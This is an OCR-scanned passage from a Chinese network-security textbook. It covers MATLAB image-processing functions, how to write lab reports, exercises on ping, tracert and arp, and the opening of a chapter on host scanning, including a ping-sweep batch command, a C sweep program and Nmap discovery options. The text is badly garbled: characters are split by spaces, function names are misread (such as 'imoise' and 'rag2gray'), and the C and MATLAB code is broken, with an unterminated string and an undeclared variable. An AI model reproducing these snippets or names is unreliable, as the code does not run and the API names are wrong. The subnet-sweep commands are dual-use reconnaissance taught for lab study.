A 二 imread(test. jpg) 表 示 把 图 像 test. jpg 读 和 人 A 和 矩阵 中 , 读 出 的 
数字 表示 的 是 图 像 中 每 个 像素 点 的 灰 度 值 , A 的 维 数 为 图 像 的 
读 出 图 像 imread() 大 小 

[I.M] = imread ('test. jpg'),I 表示 像素 矩阵 (索引 值 ),M 是 
colormap( 调 色 板 ,可 省 略 ) ,表示 本 张 图 片 所 包含 的 颜色 种 类 


存储 图 像 imwrite() 将 图 像 数据 写 人 到 图 像 文 件 中 

新 建 图 像 窗口 figure() 显示 新 图 像 ,以 免 新 图 像 履 盖 原 来 的 图 像 

多 于 由 是 个 sobplor() | 将 多 个 图 面 到 一 个 平 而 上 

显示 图 像 imshow() 显示 图 像 

读 入 图 像 信息 imfinfo) te ti a 
设置 位 Be bitset(A,bit) .A 表示 要 置 0 的 图 像 ,bit 表示 要 对 哪 一 位 置 0, 若 要 


对 最 低位 置 0. 则 bitset(A,1) 


获取 位 bitget() 取得 某 位 


imresize(X, M) ,M>1 表示 放大 ,0 二 M<1 表示 缩小 


图 像 放大 /缩小 imresize() | imresize(X,[M N]) ,产生 一 个 指定 为 MX N 大 小 的 图 像 


图 像 旋 转 imrotate( ) 对 图 像 进 行 任意 角度 的 旋转 
图 像 前 切 a 按 精确 定位 的 各 点 坐标 或 按 鼠 标 选取 和 矩形 区 域 进行 剪裁 ,并 以 新 
的 图 形 窗口 显示 出 来 
加 噪声 对 图 像 加 入 各 种 噪声 ,如 高 斯 (gaussian) ,脉冲 (salt&pepper) 、 乘 性 
中 噪声 imnoise( ) 
(speckle) 噪 声 等 
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操 作 函 数 说 明 

ee filter2() 对 二 维 信号 进行 滤波 
medfilt2() 对 二 维 信号 进行 中 值 滤波 

拉动 dither() 对 图 像 进行 抖动 
图 像 加 法 imadd() imadd(X.Y),Y 可 以 是 另 一 幅 图 像 ,也 可 以 是 常数 
图 像 减 法 imsubtract() | imsubtract(X,Y) ,计算 X 与 Y 像 素 之 差 , 负 数 将 截取 为 0 
图 像 转 为 灰 度 图 像 | rag2gray() ”| 将 真 彩色 图 像 转换 为 灰 度 图 像 
绘制 二 维 连续 图 像 | plot() 有 多 种 用 法 ,可 绘制 条 指定 属性 的 曲线 
绘制 二 维 离散 图 像 | stem() 绘制 二 维 离 散 数据 的 火柴 杆 图 


1.3.4.3 MATLAB 图 像 函数 实例 
MATLAB 的 一 些 图 像 处 理 函 数 很 常用 ,需要 很 好 地 掌握 ,熟练 使 用 。 
1. imread/imshow/imwrite 函数 


函数 imread 用 于 读 取 图 片 文件 中 的 数据 ,函数 imshow 用 于 在 MATLAB 中 显示 图 片 ， 


函数 imwrite 用 于 将 


图 像 数 据 写 人 为 图 像 文件 ,并 保存 在 磁盘 中 。 


所 谓 图 片 文 件 的 数据 ,实际 上 就 是 一 个 二 维 数组 ,这 个 二 维 数组 存储 着 一 张 图 片 各 个 像 
素 点 的 颜色 索引 值 或 颜色 值 (真正 的 图 片 文件 可 能 还 需要 一 些 附加 信息 )。 例 如 图 1-24, 就 
是 一 幅 灰 度 图 像 及 其 在 MATLAB 中 的 二 维 矩阵 形式 。 


轩 cover <512x512 uint8> 


元 3 4 5 
142| 141 140| 142 
142| 141| 140| 141| 
142| 142 141 142 
142| 141 140| 143 
142 140| 141 142| 
144 138| 134| 141| 
140| 143 139| 139| 
138 136 136| 139| 
135| 138| 137 140| 
135| 138| 138| 136| 
137| 136| 140| 137| 
136| 137| 139| 140| 
138 137| 137| 137| 
137| 138| 136 141 
140| 139 135 136| 

16 138 139 140| 139| 137 

(b) 图 像 数 据 像素 值 矩 阵 表示 


图 1-24 灰 度 图 像 及 其 二 维和 矩阵 示例 


下 面 这 段 代 码 把 24 位 真 彩色 位 图 转 为 灰 度 图 像 : 


filename= 'color .bmp'; 


imfinfo (filename); 


$s 查看 图 像 文 件 信息 
生计 


imgRgb= imread(filename) ; s# 读 入 一 幅 彩 色 图 像 


imshow (imgRgb) ; 显示 彩色 图 像 

imgGray= rgb2gray (imgRgb); $s 转 为 灰 度 图 像 

figure; $s 打开 一 个 新 窗口 

imshow (imgGray) 7 s 显 示 转 换 后 的 灰 度 图 像 
imwrite (imgGray, 'gray.jpg'); 将 灰 度 图 像 保存 到 图 像 文件 


2. rgb2gray 函数 

函数 rgb2gray 可 以 将 真 彩色 图 像 转 换 为 灰 度 图 像 , 灰 度 值 为 彩色 图 像 中 的 RG、B 分 
量 加 权 相 加 , 即 Gray 二 0. 29900R 十 0. 58700G 十 0. 11400B。 一 幅 真 彩 图 像 转换 前 后 如 
图 1-25 所 示 。 


(a) 真 彩色 图 像 (b) 转换 后 的 灰 度 图 像 
图 1-25 rgb2gray 函数 示例 


例如 ,下 列 MATLAB 片段 读 和 人 载体 图 像 orign. jpg, 并 以 灰 度 图 像 显示 : 


cover object= imread('orign.jpg'); 

if ndims (cover object)==3 $ 如 果 是 RGB 图 像 , 则 转换 为 灰 度 图 像 
Cover_object= rgb2gray (cover_ object); 

end 


figure;imshow (cover object); s 显 示 转 换 后 的 图 像 


3. plot/stem 函数 

plot 和 stem 函数 都 是 MATLAB 中 常见 的 二 维 绘图 函数 ,其 中 plot 用 于 绘制 连续 图 
形 , 而 stem 用 于 绘制 离散 图 形 ( 绘 制 的 图 形 被 称 为 “火柴 杆 图 ”)。 

例如 ,绘制 0~2 范围 的 正弦 函 数 序列 ,用 plot/stem 函数 的 MATLAB 程序 分 别 如 下 ， 
画 出 的 正弦 图 像 效 果 如 图 1-26 所 示 。 


t=0:pi/100:2x pi; t= 0:pi/100:2x pi; 
y=sin(t); sin(t); 

Plot (t,y); Stem (t, y); 

grid on grid on 


stem(n,x,'filled") 函数 第 3 个 参数 是 绘图 的 样式 .filled 表示 填充 。 用 stem 函数 绘图 ， 
只 需 将 要 绘制 的 数据 存放 在 一 个 数组 中 .然后 将 这 个 数组 作为 参数 传递 给 stem 函数 就 可 以 
得 到 输出 图 形 。 
下 二 


(a) plot 函 数 (b) stem 函 数 
图 1-26 分 别 用 plot 和 stem 函数 绘制 正弦 函数 


4.。 imnoise 函数 
在 MATLAB 中 ,采用 函数 imnoise 来 使 用 噪声 污染 一 幅 图 像 ,该 函数 的 基本 语法 是 


g= imoise (f,type,parameters) 


其 中 ff 为 输入 图 像 。 函 数 imnoise 在 给 图 像 添 加 噪声 之 前 ,将 它 转换 为 范围 [0,1] 内 的 
double 类 图 像 。 指 定 品 声 参数 时 必须 考虑 到 这 一 点 。 

imnoise 函数 的 使 用 一 般 有 下 列 几 种 格式 。 

格式 1: 

g 二 imnoise(f,'gaussian',m,var) ,表示 将 均值 m 方差 为 var 的 高 斯 噪声 加 到 图 像 人 上 ， 
默认 值 是 均值 m 为 0 ,方差 var 为 0.01 的 噪声 。 

g 一 imnoise(f,localvar',V) ,表示 将 均值 为 0, 局 部 方差 为 V 的 高 斯 噪声 添加 到 图 像 
上 ,其 中 V 是 与 f 大 小 相同 的 一 个 数组 , 它 包含 了 每 一 个 点 的 理想 方差 值 。 

格式 2: 

g 二 imnoise(f,'localvar',image_intensity,var) ,表示 将 均值 为 0 的 高 斯 噪声 添加 到 图 像 
f 中 ,其 中 噪声 的 局 部 方差 var 是 图 像 f 的 亮度 值 的 函数 。 参 量 image_intensity 和 var 是 大 
小 相同 的 向 量 ,plot(image_intensity, var) 绘 制 出 噪声 方差 和 图 像 亮 度 的 函数 关系 。 向 量 
image_intensity 必须 包含 范围 在 [0,1] 内 的 归 一 化 亮度 值 。 

格式 3: 

g 一 imnoise(f,salt&-pepper',d) ,表示 用 椒盐 噪声 污染 图 像 {, 其 中 d 是 噪声 密度 ( 即 包 
括 噪声 值 的 图 像 区 域 的 百分比 ) 。 因 此 ,大 约 有 dXnumel(f) 个 像素 受到 影响 。 默 认 的 噪声 
密度 为 0. 05。 

格式 4: 

g 二 imnoise(f,'speckle',var) ,表示 用 方程 g={ 十 nXf{f 将 乘 性 噪声 添加 到 图 像 f 上 ,其 中 
n 是 均值 为 0 ,方差 为 var 的 均匀 分 布 的 随机 噪声 , var 的 默认 值 是 0. 04。 

格式 5: 

g 一 imnoise(f, poisson) ,表示 从 数据 中 生成 泊 松 噪声 ,而 不 是 将 人 工 的 噪声 添加 到 数 
据 中 ,为 了 遵守 泊 松 统计 ,unit8 和 unit16 类 图 像 的 亮度 必须 和 光子 的 数量 相符 合 。 当 每 个 
像素 的 光子 数量 大 于 65 535 时 ,就 要 使 用 双 精 度 图 像 。 亮 度 值 在 0 一 1 之 间 变 化 ,并 且 对 应 

A 


于 光子 的 数量 除 以 10”。 
例如 ,下 列 MATLAB 程序 给 图 像 加 上 均值 为 0, 方 差 为 0. 01 的 高 斯 白 噪声 。 图 1-27 
为 图 像 加 入 噪声 前 后 对 比 图 。 


c=imread ('orign.jpg); 
I=mat2gray (c); 
g= imoisel(I,'gaussian',0,0.01); simnoise 加 高 斯 噪声 : 均值 0、 方 差 0.01( 即 默认 值 ) 


imshow (g) 


由 图 1-27 可 见 , 加 噪 后 图 像 受 损 明 显 。 如 果 方 差 接近 0. 1, 图 像 将 被 噪声 淹没 。 


(a) 原始 图 像 (b) 加 吧 后 图 像 


图 1-27 imnoise 函数 示例 


1.4 实验 测试 与 实验 报告 


计算 机 安全 的 实验 不 像 化 学 实验 那样 实验 结果 直观 易 见 。 实 验 过 程 是 否 正确 ? 实验 结 
果 如 何 测试 验证 ?实验 是 否 达 到 预期 的 目的 ? 为 了 解决 这 些 问题 ,必须 有 一 套 行 之 有 效 的 
方法 进行 实验 与 测试 ,以 提高 实验 效率 与 质量 。 


1.4.1 实验 环境 


实验 环境 包括 硬件 和 软件 ,例如 ,实验 设备 的 CPU、 内 存 等 ,操作 系统 及 其 已 安装 的 补 
丁 \ 防 火 墙 等 应 用 软件 的 版 本 等 。 这 对 实验 结论 的 正确 性 有 重要 影响 , 即 确定 了 结论 是 在 什 
么 实验 环境 下 获得 的 。 


1.4.2 注意 实验 前 后 的 对 比 


这 是 测试 实验 比较 有 效 的 方法 。 例 如 ,进行 攻防 实验 ,在 采取 防御 措施 之 前 ,攻击 是 否 
成 功 ? 而 采取 防御 措施 后 ,攻击 是 否 就 难以 进行 ? 


1.4.3 对 实验 过 程 进行 监控 


实验 过 程 监控 主要 是 利用 工具 软件 来 捕获 数据 包 并 进行 分 析 。 例 如 ,进行 防火 墙 实验 ， 
可 以 启动 Wireshark 软件 ,监控 实验 过 程 中 的 数据 包 ,深层 次 地 分 析 实 验 结果 。 
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1.4.4 实验 截图 


在 实验 报告 中 ,截图 对 说 明 实 验 过 程 很 重要 。 在 网 络 实验 过 程 中 往往 会 产生 一 些 数 据 ， 
这 些 数 据 通常 是 由 实验 者 操作 所 产生 的 (如 某 些 命令 执行 后 显示 的 结果 ) ,是 实验 过 程 不 可 
忽略 的 佐证 。 因 此 ,实验 过 程 需 对 重要 的 数据 进行 截图 。 截 图 可 以 是 当前 活动 窗口 (同时 按 
下 Alt 十 PrtScn 键 ) ,整个 屏幕 ( 按 下 PrtScn 键 ) 窗口 中 的 部 分 画面 (使 用 Windows 7 附件 
中 的 截图 工具 ) ,获取 截图 后 粘贴 到 报告 文档 中 。 由 于 截图 可 能 包含 过 多 的 信息 ,为 了 有 所 
突出 ,对 截图 还 要 进行 加 工 ,例如 标 出 关键 数据 .加 上 旁 注 等 ,加 工 后 再 呈现 到 实验 报告 中 ， 
并 配 以 适当 的 文字 说 明 。 


1.4.5 撰写 实验 报告 


等 进行 汇总 的 过 程 , 通过 撰写 实验 报告 学 生 进 一 步 巩 固 了 理论 基础 知识 自 检 实 验 中 数据 
误差 产生 的 原因 , 分 析 操 作 过 程 中 失误 的 地 方 , 是 培养 学 生 独 立 分 析 问 题 和 解决 问题 的 重 
要 环节 。 实 验 报告 可 以 明确 地 反映 出 学 生 在 实验 中 存在 的 问题 , 反映 出 学 生 对 待 实验 课 的 
认识 态度 。 工整, 规范 、 合 格 的 实验 报告 是 学 生 综合 素质 的 具体 体现 。 

实验 是 提高 动手 能 力 的 最 基本 的 方式 和 手段 。 而 实验 报告 是 对 实验 的 目的 ,准备 ,实验 
过 程 、 实 验 数 据 \ 现 象 观测 、 实 验 结果 的 客观 记录 和 总 结 。 撰 写实 验 报告 可 以 培养 敏锐 的 观 
察 .严密 的 分 析 以 及 客观 地 用 文字 进行 表述 的 能 力 。 为 了 说 明 问 题 ,在 报告 中 往往 还 需要 包 
含 一 些 实验 过 程 的 截图 。 

一 般 实验 报告 的 格式 如 下 : 

实验 目的 : 说 明 实验 要 达到 什么 目的 。 

实验 要 求 : 说 明 实 验 有 什么 具体 要 求 。 

实验 设备 : 包括 硬件 与 软件 ,如 操作 系统 .工具 软件 (如 Nessus 扫描 工具 ) 等 。 

实验 原理 : 实验 的 理论 基础 与 常用 方法 。 

实验 步骤 : 完成 实验 的 过 程 ,记录 实验 现象 ,重要 的 环节 要 有 截图 ,并 在 截图 上 标 出 关 
键 之 处 。 

实验 分 析 : 结合 实验 步骤 分 析 实 验 结果 、 相 互 关 系 和 因果 关系 。 

实验 讨论 : 交流 实验 的 心得 。 

实验 总 结 : 进行 总 结 归纳 。 


习 题 1 


1. 简 答题 

(1) ping 域名 时 为 什么 能 得 到 对 方 的 IP 地 址 ? 

(2) ping 和 tracert 是 测试 TCP/IP 网 络 连通 性 不 可 或 缺 的 两 个 工具 , 试 讨论 它们 的 适 
场景 。 

(3) ping -r,tracert、netstat -r、route print 均 是 与 路 由 有 关 的 命令 , 试 比 较 它 们 所 获得 
的 路 由 信息 的 差异 。 


到 


避 通 让 霹 


(4) 一 个 综合 了 ping 和 tracert 命令 的 是 pathping 命令 ,该 命令 跟踪 路 径 并 为 路 径 中 
的 每 个 路 由 器 和 链 路 提供 网 络 延迟 和 数据 包 丢 失信 息 。 请 使 用 pathping 命令 ,并 与 ping 
和 tracert 命令 的 执行 结果 相 比 较 。 
(5) 对 于 网 卡 配置 信息 ,可 通过 ipconfig/all、netsh interface ip show address netsh 
interface ip show config 等 命令 获得 , 试 比较 其 异同 点 。 
(6) SnifferPro 也 是 一 款 抓 取 数据 包 的 工具 ,请 自行 熟悉 并 比较 其 与 Wireshark 的 操作 
竺 点 的 异同 。 
2. 选择 题 
(1) 某 校园 网 用 户 无 法 访问 外 部 站 点 202. 116. 64.9, 管 理 人 员 在 Windows 操作 系统 中 
可 以 用 来 判断 故障 发 生 在 校园 网 内 还 是 校园 网 外 的 命令 是 ( js 
A. ping 202.116. 64.9 B. tracert 202.116.64.9 
C. netstat 202. 116. 64. 9 D. arp 202. 116. 64. 9 
(2) 检测 arp 绑 定 (动态 和 静态 ) 列 表 , 显 示 所 有 连接 了 本 地 计算 机 的 计算 机 ,显示 对 方 
的 IP 和 MAC 地 址 的 命令 是 (  )。 
A. arp -n B. arp -c C. arp -a D. arp -p 
(3) DNS 正 向 搜索 区 的 功能 是 将 域名 解析 为 IP 地 址 , Windows 系统 中 用 于 测试 该 功 
能 的 命令 是 (  )。 
A. nslookup B. arp C. netstat D. query 
(4) 在 一 台 主 机 上 用 浏览 器 无 法 访问 到 域名 为 www. online. tj. cn 的 网 站 ,并 且 在 这 台 
主机 上 执行 tracert 命令 时 有 如 下 信息 : 


Tracing route to www.online.tj.cn [202.99.64.102] 
Over a maximun of 30 hops: 

1 <lms <lms <lms 202.113.64.129 

2 <lms <ims <lms 202.113.77.1 

16 。 共 基 关 Request timed out. 

1 


* 
* 
米 


Request timed out. 


Trace complete. 


分 析 以 上 信息 ,造成 这 种 现象 的 原因 是 ( ns 
A. 该 计算 机 网 关 设置 有 误 
B. 该 计算 机 设置 的 DNS 服务 器 工作 不 正常 
C. 该 计算 机 IP 地 址 与 掩 码 设置 有 误 
D. 网 站 www. online. tj. cn 工作 不 正常 
(5) 在 一 台 主 机 上 用 浏览 器 无 法 访问 到 域名 为 www. pku. edu. cn 的 网 站 ,并 且 在 这 台 
主机 上 执行 ping 命令 时 有 如 下 信息 : 


C:\>ping www.pku.edu.cn 
Pinging www.pku.edu.cn [162.105.131.113] with 32 bytes of data: 
Request timed out. 
Request timed out. 
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Request timed out. 

Request timed out. 

Ping statistics for 162.105.131.113: 

Packets: Sent= 4, Received=0, Lost= 4(100%loss) 


分 析 以 上 信息 ,可 以 排除 的 故障 原因 是 ( js 
A. 网 络 链 路 出 现 故 障 
B. 该 计算 机 的 浏览 器 工作 不 正常 
C， 服务 器 www. pku. edu. cn 工作 不 正常 
D. 该 计算 机 设置 的 DNS 服务 器 工作 不 正常 
(6) 当 IP 包头 中 TTL 值 减 为 0 时 ,路 由 器 发 出 的 ICMP 报 文 类 型 为 ( 和 
A. 时 间 截 请求 B. 超时 C. 目标 不 可 达 D. 重 定向 
(7) 以 下 对 TCP 和 UDP 协议 区 别 的 描述 中 正确 的 是 ( 
A. UDP 用 于 帮助 IP 确保 数据 传输 ,而 TCP 无 法 实现 
B. UDP 提供 了 一 种 传输 不 可 靠 的 服务 ,主要 用 于 可 靠 性 高 的 局 域 网 中 ,TCP 的 功 
能 与 之 相反 
C. TCP 提供 了 一 种 传输 不 可 靠 的 服务 ,主要 用 于 可 靠 性 高 的 局 域 网 中 ,UDP 的 功 
能 与 之 相反 
D. 以 上 说 法 都 错误 
(8) 网 络 攻击 者 在 局 域 网 内 进行 嗅 探 ,利用 的 网 卡特 性 是 ( Xs 
A. 广播 方式 B. 组 播 方式 C. 直接 方式 D. 混杂 模式 
3. 在 抓 取 数 据 包 时 ,由 于 一 些 操作 仅 在 本 机 上 进行 (例如 ,主机 既 当 服务 器 又 当 客 户 
机 ) ,数据 并 不 需要 经 过 网 关 , 这 部 分 操作 的 数据 包 就 抓 取 不 到 。 有 人 提出 这 样 一 种 操作 方 
法 : 先 在 命令 窗口 用 route 命令 设置 本 地 路 由 ,使 得 Wireshark 能 抓 取 本 地 环 回 数据 。 假 设 
本 地 IP 地 址 是 172. 18. 43. 75 ,通过 route print 命令 观察 后 ,再 发 如 下 命令 : 


route add 172.18.43.75 mask 255.255.255.255 172.18.43.254 metric 1 


这 样 ,即使 仅 涉及 本 机 的 操作 ,通过 Wireshark 也 能 抓 取 到 数据 包 。 请 实验 验证 。 
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第 2 章 网 络 扫描 与 嗅 探 技术 


网 络 扫描 是 网 络 安全 的 重要 环节 ,本 章 主要 介绍 网 络 扫描 的 主机 存活 扫描 (ping)、 端 口 
扫描 、 操 作 系统 探测 漏洞 探测 .防火 墙 规则 探测 5 种 主要 的 扫描 技术 以 及 嗅 探 技 术 的 原理 ， 
要 点 是 扫描 的 方式 和 方法 。 


2.1 网 络 扫 描 


网 络 扫描 是 探测 网 络 或 远程 主机 信息 的 一 种 技术 ,也 是 保证 系统 和 网 络 安全 不 可 或 缺 
的 一 种 技术 手段 。 通 过 网 络 扫描 ,达到 发 现 网 络 或 主机 的 配置 .开放 的 端口 提供 的 网 络 服 
务 及 使 用 的 操作 系统 等 信息 ,揭示 其 中 可 能 存在 的 安全 隐患 和 系统 漏洞 。 这 些 信息 对 安全 
人 员 来 说 可 以 据 此 采取 相应 的 措施 有 效 防范 黑客 人 侵 , 而 对 于 入 侵 者 来 说 可 则 借 此 寻找 对 
系统 发 起 攻击 的 途径 。 

网 络 扫描 可 以 划分 为 物理 主机 存活 扫描 (ping) .端口 扫描 、 操 作 系 统 探测 、 漏 洞 探测 、 防 
火 墙 规则 探测 5 种 主要 技术 。 


2.1.1 主机 扫描 


主机 扫描 的 目的 是 确定 在 目标 网 络 上 的 主机 是 否 可 达 。ping 就 是 最 原始 的 主机 存活 
扫描 技术 ,其 利用 ICMP 的 Echo 字段 ,由 扫描 机 发 出 Echo 请 求 , 如 果 能 收 到 目标 机 Reply 
的 回应 ,说 明 目 标 主 机 存活 ( 即 可 达 ) 。 

常用 的 传统 扫描 手段 有 下 面 几 种 。 

1. ICMP Echo 扫描 

通过 简单 地 向 目标 主机 发 送 ICMP Echo Request 数据 包 ,. 并 等 待 回 复 ICMP Echo 
Reply 包 。 如 果 能 够 收 到 目标 主机 的 回复 , 则 表明 主机 处 于 活动 状态 。 这 种 扫描 方式 的 优 
点 是 简单 且 系 统 支持 ,缺点 是 容易 被 防火 墙 限制 或 过 滤 。 

例如 ,在 命令 提示 窗口 下 执行 ping 192. 31. 7. 130, 如 果 有 “ 字 节 = X X 时 间 =Xms 
TTL=XX?” 之 类 的 回复 , 则 表明 主机 192. 31.7. 130 存活 且 可 达 , 如 图 2-1 所 示 。 


ICMP Echo Request 
i 
ing 192.31.7.130 
tm 


192.168.2.23 ICMP Echo Reply 192.31.7.130 
源 主机 (存活 且 没有 被 过 滤 ) 目标 主机 
图 2-1 ping 扫描 


2. ICMP Sweep 扫描 
这 是 基于 ICMP 进行 扫射 式 的 扫描 (并 行 扫 描 ) ,也 称 ping 扫射 , 即 一 次 探测 多 个 目标 
主机 ,以 提高 探测 效率 ,适用 于 中 小 网 络 环境 。 
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图 2-2 中 是 一 个 ping 扫描 实例 ,其 中 192. 31. 7. 131 并 无 回复 192. 168. 2. 23 主机 的 


ICMP Echo Reply 包 。 因 而 对 扫描 机 192. 168. 2. 23 来 说 ,目标 主机 192. 31. 7. 131 是 不 可 
达 的 (也 可 能 是 ICMP 包 被 过 滤 了 ) 。 
oo - 国 192.31.7.130 


MP Echo RepYy 
ICMP Echo Request 
192.168.2.23 192.31.7.131 
已 {CMp Ec 
源 主机 {CMPE To Reguew 
Sho Repy 
192.31.7.132 


目标 主机 


2-2 ping 扫描 


3. Broadcast ICMP 扫描 

这 是 广播 型 ICMP 扫描 ,通过 发 送 ICMP Echo Request 请 求 包 到 广播 地 址 或 目标 网 络 
(即将 ICMP 请 求 包 的 目标 地 址 设置 为 广播 地 址 或 网 络 地 址 ), 从 而 探测 广播 域 或 整个 网 络 
范围 内 的 主机 。 这 种 广播 如 果 有 很 多 主机 回应 ,可 能 会 造成 拒绝 服务 的 危险 。 这 种 扫描 方 
式 只 适合 于 UNIX/Linux 系统 , Windows 会 忽略 这 种 请 求 包 。 

图 2-3 中 是 一 个 扫描 包 的 捕获 实例 ,其 中 , 源 主 机 是 172. 16. 20. 3/16 ,目标 主机 是 172. 
16. 25. 3/16 ,如果 将 例 中 包 的 目标 地 址 更 改 为 广播 地 址 ,然后 将 包 重 发 出 去 (一 些 网 络 包 分 
析 软 件 提供 了 此 功能 ) ,就 可 以 实现 Broadcast ICMP 扫描 。 


rane 26: 74 Bytes on wire C592 bits), 74 bytes captured 6 Ga 和 
日 Ethernet II pr cz 61 (00:88:99:00;13:61), ; 00:99:88:80:74:e6 (00: 99:88:80:74:€6) 
困 Destination: 00: 6 (00:99:88:80:74:e6) 
困 Source; 0 5 88:99:00:13:61) 
Type: Ip (Ox0800) 
田 Internet Protocol Version 4, Src: 172.16.25.3 (172.16.25.3), Dst: 172.16.20.3 (172.16.20.3) 
a Internet Control Message Protocol 


图 2-3 ping 数据 包 捕 获 


4。Non-Echo ICMP 扫描 

在 ICMP 协议 中 并 非 只 有 ICMP Echo 的 ICMP 查询 信息 类 型 ,在 ICMP 扫描 技术 中 也 
用 到 Non-Echo ICMP 技术 ( 除 能 探测 主机 外 ,还 可 以 探测 网 络 设备 ,如 路 由 器 ) 。 这 主要 是 
利用 了 ICMP 的 服务 类 型 Time Stamp (Type 13-14, 时 间 惟 请 求 和 应 答 )、Information 
(Type 15-16 ,信息 请 求 和 应 答 )、Address Mask (Type 17-18 ,地 址 掩 码 请 求 和 应 答 ) 。 当 目 
标 网 络 上 的 防火 墙 配置 为 阻止 ICMP Echo 流量 时 , 则 可 以 用 Non-Echo 扫描 来 进行 主机 
探测 。 

以 ICMP 时 间 戳 请求 和 应 答 报 文 为 例 。ICMP 时 间 截 请 求 报 文 的 类 型 为 13 ,一 台 主 机 
收 到 这 种 报 文 后 要 回应 类 型 为 14 的 ICMP 时 间 戳 应答 报 文 。 如 果 向 广播 地 址 发 出 ICMP 
时 间 惟 请 求 ,网 络 内 的 Linux 系统 会 给 予 应 答 ,而 Windows 系统 对 这 种 目的 地 址 为 广播 地 
址 或 者 网 络 地 址 的 报 文 不 予 回 应 。 由 此 可 见 , 主 机 在 接收 一 个 ICMP 时 间 戳 回应 时 ,会 暴露 
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一 个 存活 主机 的 信息 。 所 以 这 种 方法 既 可 以 用 来 探测 主机 的 连通 性 ,也 可 以 用 来 探测 主机 
的 操作 系统 类 型 。 

实验 2-1 ICMP Sweep 实验 

【实验 目的 】 

(1) 熟悉 Windows 命令 行 命令 for .ping 的 用 法 。 

(2) 用 ping 命令 实现 ICMP Sweep 扫描 。 

【实验 过 程 】 

由 于 ping 命令 只 能 单一 主机 扫描 ,所 以 进行 扫射 式 的 扫描 需要 使 用 专业 扫描 软件 , 例 
如 著名 的 SuperScan、Nmap。 事 实 上 ,如 果 用 for 适当 构建 脚本 ,或 是 在 程序 中 调用 ping 命 
令 , 也 可 以 实现 批量 扫描 。 假 设 要 实现 本 地 网 段 的 主机 扫描 ,例如 ,本 地 网 段 172. 16. 1.0， 
可 在 命令 窗口 下 执行 下 面 的 for 语句 : 


@ for /1 si in(1,1,254)do ping -n1-w2172.16.1.$i | find "TTL" && start "172.16.1.%i" 


该 命令 对 IP 段 172.16.1.0 的 254 个 本 地 主机 进行 ping 扫描 。 若 能 ping 通 , 则 将 新 打 
开 一 个 窗口 ,窗口 标题 显示 ping 通 的 IP 地 址 。 

上 述 单一 命令 可 写成 批 处 理 文件 形式 ,以 . bat 或 . cmd 为 文件 扩展 名 。 在 批 处 理 文件 
内 ,% 要 换 成 %%。 使 用 时 需 熟悉 for 语法 。for 语法 有 些 复杂 ,可 通过 for/? 获得 使 用 
帮助 。 

也 可 采用 编程 的 方法 实现 ICMP Sweep 扫描 。 在 C 语 言 中 ,可 通过 system() 函 数 直 接 
调用 Windows 命令 。 如 果 用 C 程序 来 实现 ICMP Sweep 扫描 ,一 个 简单 的 程序 可 如 下 
编写 


#include "stdio.h" 
#include "stdlib.h" 
main() 
{ 
int i; 
char comStr[28]="ping -n 1 -w2172.16.1."7 
char p4[3]; 
for (i=1;i<=255;i++){ 
sprintf(c,"%d",i); 
comStr[24]=p4[0], comStr [25]=p4[1],comStr[26]=p4[2], 
system (comStr); 


} 


程序 并 没有 涉及 网 络 编程 ,只 是 调用 并 执行 Windows 的 ping 命令 。 

【实验 思考 】 

(1) ping 扫描 没有 响应 则 一 定 表示 网 络 主机 已 经 不 处 于 网 络 之 中 吗 ? 

(2) 假如 已 经 确定 网 络 主 机 在 线 但 ping 不 通 , 可 以 进行 ICMP 以 外 的 通信 吗 ? 请 对 结 
论 进行 验证 。 

5. Nmap 实现 主机 发 现 

一 些 第 三 方 的 软件 既 可 以 单机 扫描 ,也 实现 了 ICMP Sweep 的 功能 ,例如 著名 的 扫描 工 

总 三 绿 吉 


具 Nmap。Nmap 是 一 个 免费 开放 的 网 络 扫描 和 嗅 探 工具 包 , 它 的 一 个 基本 功能 是 探测 主 


机 是 否 在 线 ,并 且 可 以 指定 探测 一 批 主机 。 关 于 Nmap, 可 参看 第 1 章 的 相关 内 容 。 


由 于 主机 发 现 的 需求 五 花 八 门 ,Nmap 提供 了 很 多 选项 来 方便 定制 ,运行 Nmap 命令 就 


可 以 发 现 其 用 法 。 其 中 关于 主机 发 现 的 一 些 基 本 参数 如 下 : 


HOST DISCOVERY: 
-sL: List Scan - simply list targets to scan 
-sn: Ping Scan -disable port scan 
-Pn: Treat all hosts as online -- Skip host discovery 
— PS/PA/PU/PY [portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
— PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
-PO[protocol list]: IP Protocol Ping 
-n/-R: Never do DNS resolution/Always resolve [default: sometimes] 
--dns- servers “servl [,serv2],...> : Specify custom DNS servers 
--system- dns: Use OS's DNS resolver 


--traceroute: Trace hop path to each host 
这 些 选项 的 意义 如 表 2-1 所 示 。 
表 2-1 主机 扫描 选项 意义 


参数 释 义 
-sL 列表 扫描 。 仅 将 指定 目标 的 IP 地 址 列举 出 来 ,不 进行 主机 发 现 
-sn 只 进行 主机 发 现 ,不 进行 端口 扫描 
Pn 将 所 有 指定 的 主机 视 作 开启 的 , 跳 过 主机 发 现 的 过 程 
-PS/PA/PU/PY 使 用 TCP SYN/ACK 或 SCTP INIT/ECHO 方式 进行 发 现 
-PE/PP/PM 使 用 ICMP echo.timestamp 和 netmask 请 求 包 发 现 主机 
-PO 使 用 IP 协议 包 探测 对 方 主机 是 否 开 启 
-n/-R 卫 表 示 不 进行 DNS 解析 ;-R 表示 总 是 进行 DNS 解析 
-dns-servers 指定 DNS 服务 器 
—system-dns 指定 使 用 系统 的 DNS 服务 器 
--traceroute 追踪 每 个 路 由 节点 


当 ICMP 包 被 目标 机 过 滤 ( 例 如 防火 墙 ) 时 , Nmap 仍 能 扫描 到 目标 主机 ,而 ping 则 不 


能 。 看 下 例 。 


【 例 2-1】 利用 Windows 的 命令 ping、Nmap 的 参数 -sP 进行 主机 发 现 , 判 断 目标 主机 


是 否 在 线 。 


假设 本 地 目标 IP 地址 为 172. 18. 187. 222, 首 先 确 定 测试 机 与 目标 机 物理 连接 是 连通 


的 。 然 后 进行 如 下 实验 : 
(1) 关闭 目标 机 的 防火 墙 , 在 命令 行 窗口 分 别 用 Windows 的 ping 命令 


ping 172.18.187.222 
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和 Nmap 命令 
nmap - SP 172.16.1.222 


进行 测试 ,记录 测试 情况 。 简 要 说 明 测试 差别 。 

(2) 开启 目标 机 的 防火 墙 ,重复 (1) ,结果 有 什么 不 同 ?” 请 说 明 原 因 。 

实验 发 现 , 关 闭 Windows 7 的 防火 墙 , 两 种 测试 方式 都 表明 目标 机 在 线 ;但 开启 了 
